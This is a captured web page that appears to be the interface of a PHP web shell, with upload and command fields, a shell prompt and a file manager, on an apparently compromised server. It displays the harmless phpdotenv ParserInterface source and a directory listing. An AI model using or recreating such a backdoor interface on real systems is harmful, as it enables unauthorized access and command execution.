404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.143.7.101: ~ $
<?php

declare(strict_types=1);

namespace Dotenv\Parser;

interface ParserInterface
{
    /**
     * Parse content into an entry array.
     *
     * @param string $content
     *
     * @throws \Dotenv\Exception\InvalidFileException
     *
     * @return \Dotenv\Parser\Entry[]
     */
    public function parse(string $content);
}

Filemanager

Name Type Size Permission Actions
Entry.php File 1014 B 0644
EntryParser.php File 12.16 KB 0644
Lexer.php File 1.24 KB 0644
Lines.php File 3.07 KB 0644
Parser.php File 1.71 KB 0644
ParserInterface.php File 334 B 0644
Value.php File 1.55 KB 0644